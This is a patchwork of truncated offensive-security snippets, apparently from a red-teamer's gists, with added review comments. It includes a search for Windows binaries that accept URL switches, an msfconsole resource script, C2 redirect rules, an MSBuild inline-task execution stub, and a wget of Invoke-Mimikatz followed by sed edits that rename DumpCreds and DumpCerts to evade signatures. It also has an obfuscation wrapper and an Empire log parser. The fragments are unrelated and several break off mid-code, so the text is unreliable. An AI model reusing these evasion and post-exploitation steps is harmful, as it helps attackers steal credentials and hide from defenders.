
# Configuration and result variables for the script.
# NOTE(review): the code that consumes them is cut off in this preview, so
# the descriptions below are read from the names and values only.
# Root directory assigned as the executable search path.
$exepath = "c:\windows"
# Strings of interest; each looks like a command-line switch name.
$searchstrings = @("/url", "/uri", "/wildcard", "/format", "/path")
# Executable names listed for exclusion (presumably never touched by the search - confirm).
$skip = @("logoff.exe", "mcrmgr.exe", "audit.exe")
# Empty arrays, presumably filled with matches and with the binaries already examined.
$foundin = @()
$testedbins = @()
Function Execute-Command ($commandPath, $commandArguments)
{
$pinfo = New-Object System.Diagnostics.ProcessStartInfo
$pinfo.FileName = $commandPath
' Reads the process-creation audit policy value from the local registry via WMI.
' ProcessCreationIncludeCmdLine_Enabled is the policy that adds the full command
' line to process-creation audit events (Security event 4688); without it those
' events carry no command line for later investigation.
Const HKLM = &H80000002 'HKEY_LOCAL_MACHINE
' "." targets the local machine.
strComputer = "."
strKey = "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit"
' Connect to the root\cimv2 namespace and fetch the StdRegProv registry provider.
Set objLocator = CreateObject("WbemScripting.SWbemLocator")
Set objReg = objLocator.ConnectServer(strComputer, "root\cimv2").Get("StdRegProv")
' Enumerate the subkeys of the Audit key into arrSubKeys.
objReg.EnumKey HKLM, strKey, arrSubKeys
' Read the DWORD into isenabled; the script tests it with IsNull right after this call.
objReg.GetDWORDValue HKLM, strkey, "ProcessCreationIncludeCmdLine_Enabled", isenabled
If IsNull(isenabled) Then
# Add to your .bashrc. May need to tweak the ifconfig output for your distro.
# Each variant below assigns PROMPT_COMMAND, which bash runs before every prompt;
# the command rebuilds PS1 as "[user.host <ip>: <dir>]$". Use ONE variant only:
# a later assignment replaces an earlier one.
# NOTE(review): inside [[ ]], ">" compares strings lexicographically, not
# numerically, so the "> 18" length test does not behave like -gt 18.
# The test chooses between \W (last path component) and \w (full path).
# Ubuntu
# Address comes from line 2 of `ifconfig eth0`: the text after the first ":" up to the next space.
PROMPT_COMMAND='PS1="\[\033[01;34m\][\u.\h \[\033[0;33m\]`ifconfig eth0 2>/dev/null | sed -n 2,2p | cut -d":" -f 2| cut -d" " -f 1`: \[\033[32m\]\`if [[ `pwd|wc -c|tr -d " "` > 18 ]]; then echo "\\W"; else echo "\\w"; fi\`]\$\[\033[0m\] "'
# Kali
# Same idea for eth1; the address is the second whitespace-separated field of line 2.
PROMPT_COMMAND='PS1="\[\033[01;34m\][\u.\h \[\033[0;33m\]`ifconfig eth1 2>/dev/null | sed -n 2,2p | awk {'"'"'print $2'"'"'}`: \[\033[32m\]\`if [[ `pwd|wc -c|tr -d " "` > 18 ]]; then echo "\\W"; else echo "\\w"; fi\`]\$\[\033[0m\] "'
# AWS EC2
# Adds a date/time stamp (\D{%F %T}) and puts "$" on its own line. The public
# IPv4 is fetched from the instance metadata service on every prompt.
# NOTE(review): the curl call has no timeout, so the prompt may stall when the
# metadata address is unreachable; it is also a tokenless (IMDSv1-style) GET,
# which will not return the address on instances that require IMDSv2 tokens.
PROMPT_COMMAND='PS1="\[\033[01;34m\][\u.\h \D{%F %T} \[\033[0;33m\]`curl http://169.254.169.254/latest/meta-data/public-ipv4 2>/dev/null`: \[\033[32m\]\`if [[ `pwd|wc -c|tr -d " "` > 18 ]]; then echo "\\W"; else echo "\\w"; fi\`]\n\$\[\033[0m\] "'
# msfconsole resource script: sets the prompt, loads plugins and defines command aliases.
# Prompt tokens: %L local address, %J job count, %S session count, %W workspace;
# %red/%yel/%grn/%blu select the colour of the token that follows.
set PROMPT %red%L %yel%J %grn%S %blu%W
# Plugins. NOTE(review): "pentest" does not appear to be a stock plugin - confirm
# it is installed before relying on this file.
load nessus
load pentest
load sounds
# The alias plugin has to be loaded before the alias commands below.
load alias
alias j "jobs -v"
alias s "sessions -v"
# NOTE(review): -f presumably forces creation of the alias - confirm against the plugin's help.
alias -f w "workspace"
alias so "show options"
alias sa "show advanced"
curi0usJack / .htaccess
Last active March 13, 2024 10:17
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
#
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
#
# Note this version requires Apache 2.4+
#
# Save this file into something like /etc/apache2/redirect.rules.
# Then in your site's apache conf file (in /etc/apache2/sites-available/), put this statement somewhere near the bottom
#
# Include /etc/apache2/redirect.rules
#
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- First target in the project (no DefaultTargets is set on the Project element),
     so MSBuild runs it by default. It invokes BusinessTime, which the UsingTask
     element in this file declares with TaskFactory="CodeTaskFactory", i.e. as an
     inline task whose code lives in the project file itself.
     Detection note: inline task code executes inside MSBuild.exe (MITRE ATT&CK
     T1127.001), so review MSBuild.exe runs against project files that sit
     outside expected build locations. -->
<Target Name="Business">
<BusinessTime />
</Target>
<UsingTask
TaskName="BusinessTime"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<ParameterGroup/>
<Task>
# Fetches Invoke-Mimikatz.ps1 from the tip of the PowerSploit master branch (no
# commit pin or checksum, so the content can differ between runs) and rewrites
# it in place with sed.
# Detection note: the edits below change only comments and two identifier
# strings, not what the script does. A signature keyed on those strings will
# miss the result; detections based on the executed script content (PowerShell
# script block logging) or on LSASS access do not depend on them.
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
# Uncomment below two lines to clean comments from all .ps1 files in ./
#find ./ -name "*.ps1" -exec sed -i -e '/^<#/,/^#>/d' {} \;
#find ./ -name "*.ps1" -exec sed -i -e 's/#.*$//' {} \;
# Delete block comments: every line range from a line starting with "<#" to one starting with "#>".
sed -i -e '/^<#/,/^#>/d' Invoke-Mimikatz.ps1
# Delete from the first "#" to end of line. The pattern is not quote-aware, so a
# "#" inside a string literal is cut as well.
sed -i -e 's/#.*$//' Invoke-Mimikatz.ps1
# Rename every occurrence of the DumpCerts and DumpCreds identifiers.
sed -i -e's/DumpCerts/GimmeCerts/g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/GimmeCreds/g' Invoke-Mimikatz.ps1
curi0usJack / gist:1eef9d94a01344bddafec7434412ec66
Created March 15, 2017 20:20
Obfuscate Command in your Clipboard (even if base64 encoded).
function obs()
{
Import-Module Invoke-Obfuscation
$s = Get-Clipboard
if ($s -eq $null)
{
Write-Host "Clipboard is nulll."
}
curi0usJack / parseagentlog.py
Created February 14, 2017 23:12
Parse AD Info from Empire agent.log
#!/usr/bin/env python
# Run this script on the agent.log file after you've run the situational_awareness/network/powerview/get_user module.
# userdata.log file is pipe delimited.
import sys
import os
class User:
UserName = ""